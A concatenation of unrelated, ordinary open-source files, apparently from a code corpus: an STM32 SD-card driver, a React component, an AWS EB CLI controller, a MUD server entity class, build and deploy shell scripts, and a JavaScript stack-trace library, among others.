*/
int32_t BSP_SD_GetCardInfo(uint32_t Instance, BSP_SD_CardInfo *CardInfo)
{
int32_t ret = BSP_ERROR_NONE;
if(Instance >= SD_INSTANCES_NBR)
{
ret = BSP_ERROR_WRONG_PARAM;
}
else
{
if(HAL_SD_GetCardInfo(&hsd_sdmmc[Instance], CardInfo) != HAL_OK)
{
ret = BSP_ERROR_PERIPH_FAILURE;
}
}
/* Return BSP status */
return ret;
}
#if !defined (USE_HAL_SD_REGISTER_CALLBACKS) || (USE_HAL_SD_REGISTER_CALLBACKS == 0)
/**
* @brief SD Abort callbacks
* @param hsd SD handle
* @retval None
*/
void HAL_SD_AbortCallback(SD_HandleTypeDef *hsd)
{
BSP_SD_AbortCallback((hsd == &hsd_sdmmc[0]) ? 0UL : 1UL);
}
/**
* @brief Tx Transfer completed callbacks
* @param hsd SD handle
* @retval None
*/
void HAL_SD_TxCpltCallback(SD_HandleTypeDef *hsd)
{
BSP_SD_WriteCpltCallback((hsd == &hsd_sdmmc[0]) ? 0UL : 1UL);
}
/**
* @brief Rx Transfer completed callbacks
* @param hsd SD handle
* @retval None
*/
void HAL_SD_RxCpltCallback(SD_HandleTypeDef *hsd)
{
BSP_SD_ReadCpltCallback((hsd == &hsd_sdmmc[0]) ? 0UL : 1UL);
}
#if (USE_SD_TRANSCEIVER != 0U)
/**
* @brief Enable the SD Transceiver 1.8V Mode Callback.
*/
void HAL_SD_DriveTransciver_1_8V_Callback(FlagStatus status)
{
#if (USE_BSP_IO_CLASS > 0U)
if(status == SET)
{
BSP_IO_WritePin(0, SD_LDO_SEL_PIN, IO_PIN_SET);
}
else
{
BSP_IO_WritePin(0, SD_LDO_SEL_PIN, IO_PIN_RESET);
}
#endif
}
#endif
#endif /* !defined (USE_HAL_SD_REGISTER_CALLBACKS) || (USE_HAL_SD_REGISTER_CALLBACKS == 0) */
/**
* @brief This function handles pin detection interrupt request.
* @param Instance SD Instance
* @retval None
*/
void BSP_SD_DETECT_IRQHandler(uint32_t Instance)
{
HAL_EXTI_IRQHandler(&hsd_exti[Instance]);
}
/**
* @brief This function handles SDMMC interrupt requests.
* @param Instance SD Instance
* @retval None
*/
void BSP_SD_IRQHandler(uint32_t Instance)
{
HAL_SD_IRQHandler(&hsd_sdmmc[Instance]);
}
/**
* @brief BSP SD Abort callbacks
* @param Instance SD Instance
* @retval None
*/
__weak void BSP_SD_AbortCallback(uint32_t Instance)
{
/* Prevent unused argument(s) compilation warning */
UNUSED(Instance);
}
/**
* @brief BSP Tx Transfer completed callbacks
* @param Instance SD Instance
* @retval None
*/
__weak void BSP_SD_WriteCpltCallback(uint32_t Instance)
{
/* Prevent unused argument(s) compilation warning */
UNUSED(Instance);
}
/**
* @brief BSP Rx Transfer completed callbacks
* @param Instance SD Instance
* @retval None
*/
__weak void BSP_SD_ReadCpltCallback(uint32_t Instance)
{
/* Prevent unused argument(s) compilation warning */
UNUSED(Instance);
}
/**
* @}
*/
/** @defgroup STM32H747I_DISCO_SD_Private_Functions Private Functions
* @{
*/
#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
/**
* @brief SD Abort callbacks
* @param hsd SD handle
* @retval None
*/
static void SD_AbortCallback(SD_HandleTypeDef *hsd)
{
BSP_SD_AbortCallback((hsd == &hsd_sdmmc[0]) ? 0UL : 1UL);
}
/**
* @brief Tx Transfer completed callbacks
* @param hsd SD handle
* @retval None
*/
static void SD_TxCpltCallback(SD_HandleTypeDef *hsd)
{
BSP_SD_WriteCpltCallback((hsd == &hsd_sdmmc[0]) ? 0UL : 1UL);
}
/**
* @brief Rx Transfer completed callbacks
* @param hsd SD handle
* @retval None
*/
static void SD_RxCpltCallback(SD_HandleTypeDef *hsd)
{
BSP_SD_ReadCpltCallback((hsd == &hsd_sdmmc[0]) ? 0UL : 1UL);
}
#endif
/**
* @brief SD EXTI line detection callbacks.
* @retval None
*/
static void SD_EXTI_Callback(void)
{
uint32_t sd_status = SD_PRESENT;
BSP_SD_DetectCallback(0,sd_status);
}
/**
* @brief Initializes the SD MSP.
* @param hsd SD handle
* @retval None
*/
static void SD_MspInit(SD_HandleTypeDef *hsd)
{
GPIO_InitTypeDef gpio_init_structure;
if(hsd == &hsd_sdmmc[0])
{
#if (USE_SD_BUS_WIDE_4B > 0)
/* SD pins are in conflict with Camera pins on the Disco board
therefore Camera must be power down before using the BSP SD
To power down the camera , Set GPIOJ pin 14 to high
*/
/* Enable GPIO J clock */
__HAL_RCC_GPIOJ_CLK_ENABLE();
gpio_init_structure.Pin = GPIO_PIN_14;
gpio_init_structure.Mode = GPIO_MODE_OUTPUT_PP;
gpio_init_structure.Pull = GPIO_NOPULL;
gpio_init_structure.Speed = GPIO_SPEED_FREQ_VERY_HIGH;
HAL_GPIO_Init(GPIOJ, &gpio_init_structure);
/* Set the camera POWER_DOWN pin (active high) */
HAL_GPIO_WritePin(GPIOJ, GPIO_PIN_14, GPIO_PIN_SET);
#endif
/* Enable SDIO clock */
__HAL_RCC_SDMMC1_CLK_ENABLE();
/* Enable GPIOs clock */
__HAL_RCC_GPIOB_CLK_ENABLE();
__HAL_RCC_GPIOC_CLK_ENABLE();
__HAL_RCC_GPIOD_CLK_ENABLE();
/* Common GPIO configuration */
gpio_init_structure.Mode = GPIO_MODE_AF_PP;
gpio_init_structure.Pull = GPIO_PULLUP;
gpio_init_structure.Speed = GPIO_SPEED_FREQ_VERY_HIGH;
gpio_init_structure.Alternate = GPIO_AF12_SDIO1;
#if (USE_SD_BUS_WIDE_4B > 0)
/* SDMMC GPIO CLKIN PB8, D0 PC8, D1 PC9, D2 PC10, D3 PC11, CK PC12, CMD PD2 */
/* GPIOC configuration */
gpio_init_structure.Pin = GPIO_PIN_8 | GPIO_PIN_9 | GPIO_PIN_10 | GPIO_PIN_11 | GPIO_PIN_12;
#else
/* SDMMC GPIO CLKIN PB8, D0 PC8, CK PC12, CMD PD2 */
/* GPIOC configuration */
gpio_init_structure.Pin = GPIO_PIN_8 | GPIO_PIN_12;
#endif
HAL_GPIO_Init(GPIOC, &gpio_init_structure);
/* GPIOD configuration */
gpio_init_structure.Pin = GPIO_PIN_2;
HAL_GPIO_Init(GPIOD, &gpio_init_structure);
/* Configure Input mode for SD detection pin */
SD_DETECT_GPIO_CLK_ENABLE();
gpio_init_structure.Pin = SD_DETECT_PIN;
gpio_init_structure.Pull = GPIO_PULLUP;
gpio_init_structure.Speed = GPIO_SPEED_FREQ_HIGH;
gpio_init_structure.Mode = GPIO_MODE_INPUT;
HAL_GPIO_Init(SD_DETECT_GPIO_PORT, &gpio_init_structure);
/* NVIC configuration for SDIO interrupts */
HAL_NVIC_SetPriority(SDMMC1_IRQn, BSP_SD_IT_PRIORITY, 0);
HAL_NVIC_EnableIRQ(SDMMC1_IRQn);
}
}
/**
* @brief DeInitializes the SD MSP.
* @param hsd SD handle
* @retval None
*/
static void SD_MspDeInit(SD_HandleTypeDef *hsd)
{
GPIO_InitTypeDef gpio_init_structure;
if(hsd == &hsd_sdmmc[0])
{
HAL_NVIC_DisableIRQ(SDMMC1_IRQn);
/* DeInit GPIO pins can be done in the application
(by surcharging this __weak function) */
/* Disable SDMMC1 clock */
__HAL_RCC_SDMMC1_CLK_DISABLE();
#if (USE_SD_BUS_WIDE_4B > 0)
/* GPIOJ configuration */
gpio_init_structure.Pin = GPIO_PIN_14;
HAL_GPIO_DeInit(GPIOJ, gpio_init_structure.Pin);
/* GPIOC configuration */
gpio_init_structure.Pin = GPIO_PIN_8 | GPIO_PIN_9 | GPIO_PIN_10 | GPIO_PIN_11 | GPIO_PIN_12;
#else
gpio_init_structure.Pin = GPIO_PIN_8 | GPIO_PIN_12;
#endif
HAL_GPIO_DeInit(GPIOC, gpio_init_structure.Pin);
/* GPIOD configuration */
gpio_init_structure.Pin = GPIO_PIN_2;
HAL_GPIO_DeInit(GPIOD, gpio_init_structure.Pin);
}
}
/**
* @}
*/
/**
* @}
*/
/**
* @}
*/
/**
* @}
*/
/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE*** */
|
import React, { Component } from "react";
import SearchBar from "../components/SearchBar";
import {
getUser,
getPosts,
setGeoLocation,
fetchLocation,
} from "../Actions/actions";
import { connect } from "react-redux";
class Home extends Component {
componentDidMount() {
this.props.getUser();
this.props.getPosts();
// this.props.fetchLocation(51.5074, -0.1278);
navigator.geolocation.getCurrentPosition((position) => {
this.props.setGeoLocation({
lat: position.coords.latitude,
lng: position.coords.longitude,
});
});
}
shouldComponentUpdate(nextProps, nextState) {
console.log(nextProps);
if (
this.props.geoLocation.lat !== nextProps.geoLocation.lat ||
this.props.geoLocation.location !== nextProps.geoLocation.location ||
this.props.userData.username !== nextProps.userData.username
) {
const { lat, lng, location } = nextProps.geoLocation;
this.props.fetchLocation(lat, lng, location);
return true;
} else return false;
}
render() {
const { userData } = this.props;
const { location } = this.props.geoLocation;
return (
<div className="wrapper">
<div>
<h1>LIVE LIKE A LOCAL</h1>
</div>
<div>
<p>current location is {location}</p>
</div>
<h4>What would you like to do today {userData.username}?</h4>
<div>
<SearchBar />
</div>
</div>
);
}
}
const mSTP = (state) => state;
export default connect(mSTP, {
getUser,
getPosts,
setGeoLocation,
fetchLocation,
})(Home);
|
# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from ebcli.core.abstractcontroller import AbstractBaseController
from ebcli.core import fileoperations
from ebcli.lib import elasticbeanstalk as elasticbeanstalk
from ebcli.operations import appversionops
from ebcli.resources.strings import strings, flag_text, alerts
from ebcli.objects.exceptions import InvalidOptionsError
class AppVersionController(AbstractBaseController):
class Meta(AbstractBaseController.Meta):
label = 'appversion'
description = strings['appversion.info']
arguments = [
(
['--delete', '-d'],
dict(
action='store',
help=flag_text['appversion.delete'],
metavar='VERSION_LABEL')
),
(['--create', '-c'], dict(action='store_true', help=flag_text['appversion.create'])),
(['--application', '-a'], dict(help=flag_text['appversion.application'])),
(['--label', '-l'], dict(help=flag_text['deploy.label'])),
(['--message', '-m'], dict(help=flag_text['deploy.message'])),
(['--staged'], dict(
action='store_true', help=flag_text['appversion.staged'])),
(['--timeout'], dict(default=5, type=int, help=flag_text['general.timeout'])),
(['--source'], dict(help=flag_text['appversion.source'])),
(['--process', '-p'], dict(
action='store_true', help=flag_text['deploy.process']))
]
usage = 'eb appversion <lifecycle> [options ...]'
def do_command(self):
if self.app.pargs.application is not None:
self.app_name = self.app.pargs.application
else:
self.app_name = self.get_app_name()
self.env_name = self.get_env_name(noerror=True)
if self.app.pargs.create and self.app.pargs.delete is not None:
raise InvalidOptionsError(alerts['create.can_not_use_options_together'].format("--create", "--delete"))
if self.app.pargs.create:
self.message = self.app.pargs.message
self.staged = self.app.pargs.staged
self.source = self.app.pargs.source
self.label = self.app.pargs.label
self.timeout = self.app.pargs.timeout
self.process = self.app.pargs.process or fileoperations.env_yaml_exists()
appversionops.create_app_version_without_deployment(self.app_name, self.label, self.staged, self.process,
self.message, self.source, self.timeout)
return
if self.app.pargs.delete is not None:
version_label_to_delete = self.app.pargs.delete
appversionops.delete_app_version_label(self.app_name, version_label_to_delete)
return
self.interactive_list_version()
def interactive_list_version(self):
"""Interactive mode which allows user to see previous
versions and allow a choice to:
- deploy a different version.
- delete a certain version
Run when the user supplies no argument to the --delete flag.
"""
app_versions = elasticbeanstalk.get_application_versions(self.app_name)['ApplicationVersions']
appversionops.display_versions(self.app_name, self.env_name, app_versions)
|
<reponame>hyena/mutgos_server<filename>src/dbtypes/dbtype_Thing.cpp
/*
* dbtype_Thing.cpp
*/
#include <string>
#include <iostream>
#include "dbtypes/dbtype_Thing.h"
#include "dbtypes/dbtype_Entity.h"
#include "dbtypes/dbtype_Id.h"
#include "dbtypes/dbtype_ContainerPropertyEntity.h"
#include "concurrency/concurrency_ReaderLockToken.h"
#include "concurrency/concurrency_WriterLockToken.h"
#include "concurrency/concurrency_LockableObject.h"
#include "logging/log_Logger.h"
namespace mutgos
{
namespace dbtype
{
// -----------------------------------------------------------------------
Thing::Thing()
: ContainerPropertyEntity()
{
}
// -----------------------------------------------------------------------
Thing::Thing(const Id &id)
: ContainerPropertyEntity(id, ENTITYTYPE_thing, 0, 0)
{
}
// -----------------------------------------------------------------------
Thing::~Thing()
{
}
// ----------------------------------------------------------------------
Entity *Thing::clone(
const Id &id,
const VersionType version,
const InstanceType instance,
concurrency::ReaderLockToken &token)
{
if (token.has_lock(*this))
{
Entity *copy_ptr = new Thing(
id,
ENTITYTYPE_thing,
version,
instance);
copy_fields(copy_ptr);
return copy_ptr;
}
else
{
LOG(error, "dbtype", "clone",
"Using the wrong lock token!");
return 0;
}
}
// ----------------------------------------------------------------------
std::string Thing::to_string(void)
{
concurrency::ReaderLockToken token(*this);
std::ostringstream strstream;
strstream << ContainerPropertyEntity::to_string()
<< "Thing home: " << thing_home.to_string()
<< std::endl
<< "Thing lock: " << thing_lock.to_string()
<< std::endl;
return strstream.str();
}
// ----------------------------------------------------------------------
bool Thing::set_thing_home(
const Id &home,
concurrency::WriterLockToken &token)
{
bool success = false;
if (token.has_lock(*this))
{
set_single_id_field(
ENTITYFIELD_thing_home,
thing_home,
home);
thing_home = home;
notify_field_changed(ENTITYFIELD_thing_home);
success = true;
}
else
{
LOG(error, "dbtype", "set_thing_home",
"Using the wrong lock token!");
}
return success;
}
// ----------------------------------------------------------------------
bool Thing::set_thing_home(const Id &home)
{
concurrency::WriterLockToken token(*this);
return set_thing_home(home, token);
}
// ----------------------------------------------------------------------
Id Thing::get_thing_home(concurrency::ReaderLockToken &token)
{
Id result;
if (token.has_lock(*this))
{
result = thing_home;
}
else
{
LOG(error, "dbtype", "get_thing_home",
"Using the wrong lock token!");
}
return result;
}
// ----------------------------------------------------------------------
Id Thing::get_thing_home(void)
{
concurrency::ReaderLockToken token(*this);
return get_thing_home(token);
}
// ----------------------------------------------------------------------
bool Thing::set_thing_lock(
const Lock &lock,
concurrency::WriterLockToken &token)
{
bool result = false;
if (token.has_lock(*this))
{
thing_lock = lock;
notify_field_changed(ENTITYFIELD_thing_lock);
result = true;
}
else
{
LOG(error, "dbtype", "set_thing_lock",
"Using the wrong lock token!");
}
return result;
}
// ----------------------------------------------------------------------
bool Thing::set_thing_lock(const Lock &lock)
{
concurrency::WriterLockToken token(*this);
return set_thing_lock(lock, token);
}
// ----------------------------------------------------------------------
Lock Thing::get_thing_lock(concurrency::ReaderLockToken &token)
{
Lock result;
if (token.has_lock(*this))
{
result = thing_lock;
}
else
{
LOG(error, "dbtype", "get_thing_lock",
"Using the wrong lock token!");
}
return result;
}
// ----------------------------------------------------------------------
Lock Thing::get_thing_lock(void)
{
concurrency::ReaderLockToken token(*this);
return get_thing_lock(token);
}
// ----------------------------------------------------------------------
Lock::LockType Thing::get_thing_lock_type(
concurrency::ReaderLockToken &token)
{
Lock::LockType result = Lock::LOCK_INVALID;
if (token.has_lock(*this))
{
result = thing_lock.get_lock_type();
}
else
{
LOG(error, "dbtype", "get_thing_lock_type",
"Using the wrong lock token!");
}
return result;
}
// ----------------------------------------------------------------------
Id Thing::get_thing_lock_id(concurrency::ReaderLockToken &token)
{
Id result;
if (token.has_lock(*this))
{
result = thing_lock.get_id();
}
else
{
LOG(error, "dbtype", "get_thing_lock_id",
"Using the wrong lock token!");
}
return result;
}
// ----------------------------------------------------------------------
PropertyDirectory::PathString Thing::get_thing_lock_path(
concurrency::ReaderLockToken &token)
{
PropertyDirectory::PathString result;
if (token.has_lock(*this))
{
result = thing_lock.get_path();
}
else
{
LOG(error, "dbtype", "get_thing_lock_path",
"Using the wrong lock token!");
}
return result;
}
// ----------------------------------------------------------------------
bool Thing::evalute_lock(
concurrency::ReaderLockToken &token,
Entity *entity_ptr,
concurrency::WriterLockToken &entity_token)
{
bool result = false;
if (token.has_lock(*this))
{
if (not entity_ptr)
{
LOG(error, "dbtype", "evaluate_lock(property/ID)",
"entity_ptr is null!");
}
result = thing_lock.evaluate(entity_ptr, entity_token);
}
else
{
LOG(error, "dbtype", "evaluate_lock(property/ID)",
"Using the wrong lock token!");
}
return result;
}
// ----------------------------------------------------------------------
bool Thing::evaluate_lock(
concurrency::ReaderLockToken &token,
Entity *entity_ptr,
Group *group_ptr,
concurrency::ReaderLockToken &group_token)
{
bool result = false;
if (token.has_lock(*this))
{
if (not entity_ptr)
{
LOG(error, "dbtype", "evaluate_lock(group)",
"entity_ptr is null!");
}
if (not group_ptr)
{
LOG(error, "dbtype", "evaluate_lock(group)",
"group_ptr is null!");
}
result = thing_lock.evaluate(entity_ptr, group_ptr, group_token);
}
else
{
LOG(error, "dbtype", "evaluate_lock(group)",
"Using the wrong lock token!");
}
return result;
}
// ----------------------------------------------------------------------
Thing::Thing(
const Id &id,
const EntityType &type,
const VersionType version,
const InstanceType instance,
const bool restoring)
: ContainerPropertyEntity(id, type, version, instance, restoring)
{
}
// ----------------------------------------------------------------------
size_t Thing::mem_used_fields(void)
{
size_t total_memory = ContainerPropertyEntity::mem_used_fields();
total_memory += thing_home.mem_used()
+ thing_lock.mem_used();
return total_memory;
}
// ----------------------------------------------------------------------
void Thing::copy_fields(Entity *entity_ptr)
{
ContainerPropertyEntity::copy_fields(entity_ptr);
Thing *cast_ptr = 0;
// Only copy if this is also a Thing.
if (entity_ptr and
((cast_ptr = (dynamic_cast<Thing *>(entity_ptr))) != 0))
{
cast_ptr->set_single_id_field(
ENTITYFIELD_thing_home,
cast_ptr->thing_home,
thing_home);
cast_ptr->thing_home = thing_home;
cast_ptr->notify_field_changed(ENTITYFIELD_thing_home);
cast_ptr->thing_lock = thing_lock;
cast_ptr->notify_field_changed(ENTITYFIELD_thing_lock);
}
}
} /* namespace dbtype */
} /* namespace mutgos */ |
#!/bin/sh
cp lib/asm-all-4.0.jar bin/; cp lib/kxml2-2.3.0.jar bin/; cp lib/log4j-1.2.16.jar bin/; cp lib/objenesis-1.2.jar bin/; cp lib/xstream-1.4.2.jar bin/;
cd bin
unzip -n asm-all-4.0.jar; unzip -n kxml2-2.3.0.jar; unzip -n log4j-1.2.16.jar; unzip -n objenesis-1.2.jar; unzip -n xstream-1.4.2.jar
rm asm-all-4.0.jar; rm kxml2-2.3.0.jar; rm log4j-1.2.16.jar; rm objenesis-1.2.jar; rm xstream-1.4.2.jar; rm -rf META-INF/
|
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression
# Load the dataset
train_data_path = 'train_data.csv'
train_data = pd.read_csv(train_data_path)
# Prepare the input and output variables
X = train_data[['x1', 'x2', 'x3', 'x4']]
y = train_data['y']
# Create and fit the logistic regression model
model = LogisticRegression().fit(X, y) |
/**
* This program and the accompanying materials
* are made available under the terms of the License
* which accompanies this distribution in the file LICENSE.txt
*/
package com.archimatetool.editor.ui.factory;
import org.eclipse.emf.ecore.EAttribute;
import org.eclipse.emf.ecore.EObject;
import org.eclipse.gef.EditPart;
import org.eclipse.jface.resource.ImageDescriptor;
import org.eclipse.swt.graphics.Image;
/**
* Abstract Object UI Provider
*
* @author <NAME>
*/
public abstract class AbstractObjectUIProvider implements IObjectUIProvider {
/**
* The instance of object for this provider.
* If this is null then we are concerned with the class.
*/
protected EObject instance;
protected AbstractObjectUIProvider() {
}
// Don't call this unless you are a Unit Test or a Factory
// The instance needs to be of the same EClass as this is a provider for
void setInstance(EObject instance) {
this.instance = instance;
}
@Override
public String getDefaultName() {
return ""; //$NON-NLS-1$
}
@Override
public EditPart createEditPart() {
return null;
}
@Override
public Image getImage() {
return null;
}
@Override
public ImageDescriptor getImageDescriptor() {
return null;
}
@Override
@Deprecated
public boolean shouldExposeFeature(EAttribute feature) {
return shouldExposeFeature(feature.getName());
}
@Override
public boolean shouldExposeFeature(String featureName) {
return true;
}
}
|
#!/bin/bash
set -e
# Login with `oc login ...` before running.
oc project officehours-qa
docker login -u `oc whoami` -p `oc whoami -t` docker-registry.webplatformsunpublished.umich.edu
docker build -t docker-registry.webplatformsunpublished.umich.edu/officehours-qa/officehours .
docker push docker-registry.webplatformsunpublished.umich.edu/officehours-qa/officehours
|
/**
*
* @creatTime 下午3:37:33
* @author Eddy
*/
package org.eddy.tiger.annotated.impl;
import java.lang.annotation.Annotation;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.lang.reflect.Type;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
import javax.enterprise.inject.spi.AnnotatedConstructor;
import javax.enterprise.inject.spi.AnnotatedField;
import javax.enterprise.inject.spi.AnnotatedMethod;
import javax.enterprise.inject.spi.AnnotatedType;
import javax.inject.Inject;
import javax.inject.Named;
import org.eddy.tiger.util.Reflects;
/**
* @author Eddy
*
*/
public class AnnotatedTypeImpl<X> implements AnnotatedType<X> {
private Class<X> beanClass;
private Set<AnnotatedField<? super X>> annotatedFields = new HashSet<>();
private Set<AnnotatedConstructor<X>> annotatedConstructors = new HashSet<>();
private Set<AnnotatedMethod<? super X>> annotatedMethods = new HashSet<>();
/**
* 构造函数
* @creatTime 下午3:44:05
* @author Eddy
*/
public AnnotatedTypeImpl() {
// TODO Auto-generated constructor stub
}
/**
* 判断是否为{@code Inject}}注入点
* @param annos
* @return
* @creatTime 上午9:15:54
* @author Eddy
*/
private boolean inject(Annotation[] annos) {
for (Annotation ann : annos) {
if (ann.annotationType().equals(Inject.class)) {
return true;
}
}
return false;
}
/**
* 判断是否为{@code Named}}注入点
* @param annos
* @return
* @creatTime 下午8:07:16
* @author Eddy
*/
private boolean named(Annotation[] annos) {
for (Annotation ann : annos) {
if (ann.annotationType().equals(Named.class)) {
return true;
}
}
return false;
}
/**
* 判断是否为{@code Named}}注入点
* @param annos
* @return
* @creatTime 下午8:07:16
* @author Eddy
*/
@SuppressWarnings("unused")
@Deprecated
private boolean named(Annotation[][] annos) {
for (Annotation[] ann : annos) {
if (named(ann)) return true;
}
return false;
}
/**
* 构造函数
* @creatTime 下午3:44:05
* @author Eddy
*/
public AnnotatedTypeImpl(Class<X> glass) {
this.beanClass = glass;
initFields();
initConstructor();
initMethods();
}
/**
*
* @creatTime 下午2:05:20
* @author Eddy
*/
private void initMethods() {
Set<Method> set = Reflects.getMethods(this.beanClass);
for (Method method : set) {
if(!inject(method.getAnnotations())) continue;
annotatedMethods.add(new AnnotatedMethodImpl<X>(method));
}
}
/**
*
* @creatTime 下午2:05:16
* @author Eddy
*/
private void initConstructor() {
Set<Constructor<?>> set = Reflects.getConstructors(this.beanClass);
for (Constructor<?> constructor : set) {
if(!inject(constructor.getAnnotations())) continue;
annotatedConstructors.add(new AnnotatedConstructorImpl<X>(constructor));
}
}
/**
*
* @creatTime 下午1:54:49
* @author Eddy
*/
private void initFields() {
Set<Field> set = Reflects.getFields(this.beanClass);
for (Field field : set) {
if (named(field.getAnnotations())) {
annotatedFields.add(new AnnotatedFieldImpl<X>(field, getName(field.getAnnotations())));
} else if (inject(field.getAnnotations())) {
annotatedFields.add(new AnnotatedFieldImpl<X>(field));
}
}
}
/**
* 获取注入点名称
* @param annotations
* @return
* @creatTime 下午8:11:57
* @author Eddy
*/
private String getName(Annotation[] annotations) {
for (Annotation ann : annotations) {
if (ann.annotationType().equals(Named.class)) {
return ((Named) ann).value();
}
}
return "";
}
/* (non-Javadoc)
* @see javax.enterprise.inject.spi.Annotated#getBaseType()
*/
@Override
public Type getBaseType() {
return this.beanClass;
}
/* (non-Javadoc)
* @see javax.enterprise.inject.spi.Annotated#getTypeClosure()
*/
@Override
public Set<Type> getTypeClosure() {
throw new UnsupportedOperationException("Not supported yet.");
}
/* (non-Javadoc)
* @see javax.enterprise.inject.spi.Annotated#getAnnotation(java.lang.Class)
*/
@Override
public <T extends Annotation> T getAnnotation(Class<T> annotationType) {
return this.beanClass.getAnnotation(annotationType);
}
/* (non-Javadoc)
* @see javax.enterprise.inject.spi.Annotated#getAnnotations()
*/
@Override
public Set<Annotation> getAnnotations() {
return new HashSet<>(Arrays.asList(this.beanClass.getAnnotations()));
}
/* (non-Javadoc)
* @see javax.enterprise.inject.spi.Annotated#isAnnotationPresent(java.lang.Class)
*/
@Override
public boolean isAnnotationPresent(Class<? extends Annotation> annotationType) {
return this.beanClass.isAnnotationPresent(annotationType);
}
/* (non-Javadoc)
* @see javax.enterprise.inject.spi.AnnotatedType#getJavaClass()
*/
@Override
public Class<X> getJavaClass() {
return this.beanClass;
}
/* (non-Javadoc)
* @see javax.enterprise.inject.spi.AnnotatedType#getConstructors()
*/
@Override
public Set<AnnotatedConstructor<X>> getConstructors() {
return this.annotatedConstructors;
}
/* (non-Javadoc)
* @see javax.enterprise.inject.spi.AnnotatedType#getMethods()
*/
@Override
public Set<AnnotatedMethod<? super X>> getMethods() {
return this.annotatedMethods;
}
/* (non-Javadoc)
* @see javax.enterprise.inject.spi.AnnotatedType#getFields()
*/
@Override
public Set<AnnotatedField<? super X>> getFields() {
return this.annotatedFields;
}
}
|
// Copyright (c) 2022 <NAME>. All Rights Reserved.
// https://github.com/cinar/indicatorts
import { Asset } from '../asset';
import { Action } from '../action';
import { parabolicSar } from '../../indicator/trend/parabolicSar';
import { Trend } from '../../indicator/trend';
/**
* Parabolic SAR strategy function.
*
* @param asset asset object.
* @return strategy actions.
*/
export function parabolicSarStrategy(asset: Asset): Action[] {
const psar = parabolicSar(asset.highs, asset.lows, asset.closings);
return psar.trends.map((trend) => {
switch (trend) {
case Trend.FALLING:
return Action.SELL;
case Trend.RISING:
return Action.BUY;
case Trend.STABLE:
return Action.HOLD;
}
});
}
|
const Manager = require('../lib/manager');
describe('Manager', () => {
describe('Create', () => {
it('Should create a add Manager role and github username', () => {
const result = new Manager.Manager("<NAME>", "01", "<EMAIL>", "42069", "Manager");
expect(result).toEqual({
employeeName: "<NAME>",
id: "01",
email: "<EMAIL>",
number: "42069",
role: "Manager"
});
});
});
}); |
<filename>index.js
/*!
* stacktrace-metadata <https://github.com/tunnckoCore/stacktrace-metadata>
*
* Copyright (c) <NAME> <@tunnckoCore> (https://i.am.charlike.online)
* Released under the MIT license.
*/
'use strict'
var extend = require('extend-shallow')
var findCallsite = require('find-callsite')
var clean = require('clean-stacktrace')
var metadata = require('clean-stacktrace-metadata')
var relativePaths = require('clean-stacktrace-relative-paths')
/**
* > Cleans stack trace and attaches few more metadata properties,
* such as `at`, `line`, `column`, `filename` and `place`. By default
* it cleans stack, makes is short (4 length) and makes paths relative.
* But all this is controllable through `options` object.
* Throws `TypeError` if `error` is not an instance of Error.
*
* **Example**
*
* ```js
* const metadata = require('stacktrace-metadata')
*
* const error = new Error('foo quxie')
* error.stack = `Error: foo quxie
* at zazz (/home/charlike/apps/alwa.js:8:10)
* at module.exports (/home/charlike/apps/foo.js:6:3)
* at Object.<anonymous> (/home/charlike/apps/dush.js:45:3)
* at Module._compile (module.js:409:26)
* at Object.Module._extensions..js (module.js:416:10)
* at Module.load (module.js:343:32)
* at Function.Module._load (module.js:300:12)
* at Function.Module.runMain (module.js:441:10)
* at startup (node.js:139:18)
* `
* const err = metadata(error)
*
* console.log(err.line) // => 8
* console.log(err.column) // => 10
* console.log(err.filename) // => 'alwa.js'
* console.log(err.place) // => 'zazz'
* console.log(err.at) // => 'zazz (alwa.js:8:10)'
* console.log(err.stack)
* // =>
* // Error: foo quxie
* // at zazz (alwa.js:8:10)
* // at module.exports (foo.js:6:3)
* // at Object.<anonymous> (dush.js:45:3)
* ```
*
* @name stacktraceMetadata
* @param {Error} `error` real error object, checked against `instanceof Error`
* @param {Object} `options` optional options object for more control
* @param {Boolean} `options.cleanStack` if `false` won't clean stack trace from node internals
* @param {Boolean} `options.shortStack` if `false` full stack traces, otherwise they are just four
* @param {Boolean} `options.showStack` if `false` the error.stack will be empty string
* @param {Boolean} `options.relativePaths` if `false` paths in stack traces will be absolute
* @param {Function} `options.mapper` called on each line of the stack with `(line, index)` signature
* @param {String} `options.cwd` current working directory, default `process.cwd()`
* @return {Error} same error object, but modified
* @throws {TypeError} If `error` not instance of Error
* @api public
*/
module.exports = function stacktraceMetadata (error, options) {
if (!(error instanceof Error)) {
throw new TypeError('stacktrace-metadata: expect `error` to be real error')
}
if (typeof error.stack === 'string' && error.stack.length) {
var opts = extend({
showStack: true,
shortStack: true,
cleanStack: true,
relativePaths: true
}, options)
var relative = function relative (val) {
return opts.relativePaths ? relativePaths(opts.cwd)(val) : val
}
var stack = clean(error.stack, function mapper (line, index) {
line = typeof opts.mapper === 'function'
? (opts.mapper(line, index) || line)
: line
line = relative(line)
return line
})
if (!opts.cleanStack) {
stack = error.stack
}
var at = findCallsite(stack, opts)
metadata(mapdata(error))(at)
stack = opts.shortStack
? stack.split('\n').splice(0, 4).join('\n')
: stack
error.stack = opts.showStack ? stack : ''
return error
}
return error
}
function mapdata (error) {
return function mapper (_, info) {
var atLine = info.place.length ? [
info.place,
' ('
] : []
atLine = atLine.concat([
info.filename,
':',
info.line,
':',
info.column
])
atLine = info.place.length ? atLine.concat(')') : atLine
error.at = atLine.join('')
error.line = info.line
error.place = info.place
error.column = info.column
error.filename = info.filename
}
}
|
#!/bin/bash
set -o errexit
set -o nounset
lawn="$(cd "$(dirname "$0")"; pwd)"
link() {
local lawn_path="$lawn/$1"
local home_path="$HOME/$2"
if [[ ! -e "$lawn_path" ]]; then
echo "Nothing present at $lawn_path, skipping."
return
fi
if [[ ! -e "$home_path" ]]; then
mkdir -p "$(dirname "$home_path")"
